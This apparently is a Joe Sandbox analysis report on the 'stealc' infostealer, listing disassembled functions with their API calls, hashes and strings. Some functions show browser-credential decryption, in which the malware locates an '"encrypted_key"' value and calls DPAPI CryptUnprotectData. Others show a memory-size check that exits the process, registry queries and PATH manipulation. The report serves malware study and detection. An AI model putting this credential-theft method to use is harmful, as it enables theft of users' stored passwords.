Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 2f2075172e1a2a29246b2e1521165a1d7e7a58d3c227642de2c71f4abc96d1ec
Instruction ID: 780c6beba197c5f1e23e687d6b061bdf73121757c9415e3c1a485fb3d8066330
Opcode Fuzzy Hash: 2f2075172e1a2a29246b2e1521165a1d7e7a58d3c227642de2c71f4abc96d1ec
Instruction Fuzzy Hash: BE41BCB6D10108ABDB14FBA4DD4AFFE733DAB48300F408658B61957181EE795B888BD2

Function 007799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
LocalFree.KERNEL32(007802E7), ref: 00779A90
CloseHandle.KERNEL32(000000FF), ref: 00779A9A

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: a1a30dafccf18f5ae49b0ffcc27d339c02fbff286614935ba2da57150fefb7e1
Instruction ID: 96925ab3b8414295abee328d7aaf52e97c356ac54fa2768ad8f1c7c18618b28e
Opcode Fuzzy Hash: a1a30dafccf18f5ae49b0ffcc27d339c02fbff286614935ba2da57150fefb7e1
Instruction Fuzzy Hash: 763127B4A02209EFDF14CFA4C989BAE77B5FF48350F10C158E905A7290D778AA41CFA1

Function 00771220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0077123E
__aulldiv.LIBCMT ref: 00771258
__aulldiv.LIBCMT ref: 00771266
ExitProcess.KERNEL32 ref: 00771294

Strings

@, xrefs: 00771233

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 88a13258e74346e657fe6f0ccd58b82390508649a4cfa77827977626ce11be1d
Instruction ID: ef005445e71215c90fa7875e660c9c3b6e29a9fca8591cdc3d84492ca14660b5
Opcode Fuzzy Hash: 88a13258e74346e657fe6f0ccd58b82390508649a4cfa77827977626ce11be1d
Instruction Fuzzy Hash: 1E0162B0E44308FADF10EBE4CC49BADB778BB04741F60C144E709B62C1D77859418759

Function 00779CE0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
Part of subcall function 007799C0: ReadFile.KERNEL32(000000FF,?,00000000,007802E7,00000000), ref: 00779A5A
Part of subcall function 007799C0: LocalFree.KERNEL32(007802E7), ref: 00779A90
Part of subcall function 007799C0: CloseHandle.KERNEL32(000000FF), ref: 00779A9A

Part of subcall function 00788E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00788E52

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00779D39

Part of subcall function 00779AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nw,00000000,00000000), ref: 00779AEF
Part of subcall function 00779AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00774EEE,00000000,?), ref: 00779B01
Part of subcall function 00779AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nw,00000000,00000000), ref: 00779B2A
Part of subcall function 00779AC0: LocalFree.KERNEL32(?,?,?,?,00774EEE,00000000,?), ref: 00779B3F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 00779D92

Part of subcall function 00779B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00779B84
Part of subcall function 00779B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00779BA3
Part of subcall function 00779B60: memcpy.MSVCRT(?,?,?), ref: 00779BC6
Part of subcall function 00779B60: LocalFree.KERNEL32(?), ref: 00779BD3

Strings

, xrefs: 00779DC1
DPAPI, xrefs: 00779D89
"encrypted_key":", xrefs: 00779D30

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 0724081305a2a864f07f796f4b28b6abbb2f4825058518937aed459020658a79
Instruction ID: e8effb8062f65c4bf82796d69fb4e7d13fc4a0b41d1998c9f06cc7f8baa25567
Opcode Fuzzy Hash: 0724081305a2a864f07f796f4b28b6abbb2f4825058518937aed459020658a79
Instruction Fuzzy Hash: BA3163B5E11209EBCF14EFE4DC85AEE77B8BF48344F548519EA05A3241F7389A14CBA1

Function 00787E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00787E37
HeapAlloc.KERNEL32(00000000), ref: 00787E3E
RegOpenKeyExA.KERNEL32(80000002,00CF8410,00000000,00020119,?), ref: 00787E5E
RegQueryValueExA.KERNEL32(?,00CFFFA0,00000000,00000000,000000FF,000000FF), ref: 00787E7F
RegCloseKey.ADVAPI32(?), ref: 00787E92

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: ca439a6df788d93d6cbc76330baf59d5f8e2702d248cee87bdb87416c5e61713
Instruction ID: ed93c448f58fcbc15298c39b52fe3183f7b81ee253719ce64d82a96cbdd7322a
Opcode Fuzzy Hash: ca439a6df788d93d6cbc76330baf59d5f8e2702d248cee87bdb87416c5e61713
Instruction Fuzzy Hash: 921151B1A58205EFD714DF94DD89F7BBBB8EB04710F104259F606A7690D7785800DBA1

Function 007712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 007712B4
HeapAlloc.KERNEL32(00000000), ref: 007712BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 007712D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 007712F5
RegCloseKey.ADVAPI32(?), ref: 007712FF

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d0157ece391441d9fcfc9b4cc217c20c77a90a90d7066b43d0afbe6e81dd3687
Instruction ID: ec5f812bb71d6b728ba154dc2f9b93b47aa87ed8d6fc08faec4775b9eebec176
Opcode Fuzzy Hash: d0157ece391441d9fcfc9b4cc217c20c77a90a90d7066b43d0afbe6e81dd3687
Instruction Fuzzy Hash: 320136B5A54208BBDB00DFD4DD89FAEB7BCEB48711F008155FA0597280DA749A019F51

Function 00780740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CFD968), ref: 0078079A
StrCmpCA.SHLWAPI(00000000,00CFD9C8), ref: 00780866
StrCmpCA.SHLWAPI(00000000,00CFD8F8), ref: 0078099D

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Strings

`_x, xrefs: 00780A40, 00780A54, 00780803, 0078091B, 00780806, 0078091E, 00780A43

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_x
API String ID: 3722407311-3563825831
Opcode ID: 77362d070b18b6105937ab2b2e5ba8b828acefa23b73e1c75b983b5608c69cfe
Instruction ID: 0cbb315e38f4a015bcc71d59229b2fe3260139721170db3f11b95cb704a1d687
Opcode Fuzzy Hash: 77362d070b18b6105937ab2b2e5ba8b828acefa23b73e1c75b983b5608c69cfe
Instruction Fuzzy Hash: EA916875A10208EFDF28FF64D995AED77B5FF94300F508519E8099F241DB38AA09CB92

Function 00780765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CFD968), ref: 0078079A
StrCmpCA.SHLWAPI(00000000,00CFD9C8), ref: 00780866
StrCmpCA.SHLWAPI(00000000,00CFD8F8), ref: 0078099D

Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6

Strings

`_x, xrefs: 00780803, 0078091B, 00780806, 0078091E

Memory Dump Source

Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true

Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_x
API String ID: 3722407311-3563825831
Opcode ID: 95ed21fc70dce1236e5221b1a1260685bd8113a7fc07dd2689a6456d78c4f9c2
Instruction ID: 1dbfeb3d49534b0c21818bbb609459a8661451f8859464c833e6b34600cbf2b9
Opcode Fuzzy Hash: 95ed21fc70dce1236e5221b1a1260685bd8113a7fc07dd2689a6456d78c4f9c2
Instruction Fuzzy Hash: 50818675A10208EFDF18FF64D995AEDB7B5FF94300F508119E8099B241DB34AA06CB92

Function 0077A0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00CFD718,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00780153), ref: 0077A0BD
LoadLibraryA.KERNEL32(00CFBE48,?,?,?,?,?,?,?,?,?,?,?,00780153), ref: 0077A146

Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788

Part of subcall function 0078A820: lstrlenA.KERNEL32(00000000,?,?,00785B54,00790ADB,00790ADA,?,?,00786B16,00000000,?,00CF1620,?,0079110C,?,00000000), ref: 0078A82B
Part of subcall function 0078A820: lstrcpy.KERNEL32(y,00000000), ref: 0078A885

Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12

Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982

Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905

SetEnvironmentVariableA.KERNEL32(00CFD718,00000000,00000000,?,007912D8,?,00780153,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps,00790AFE), ref: 0077A132

Strings

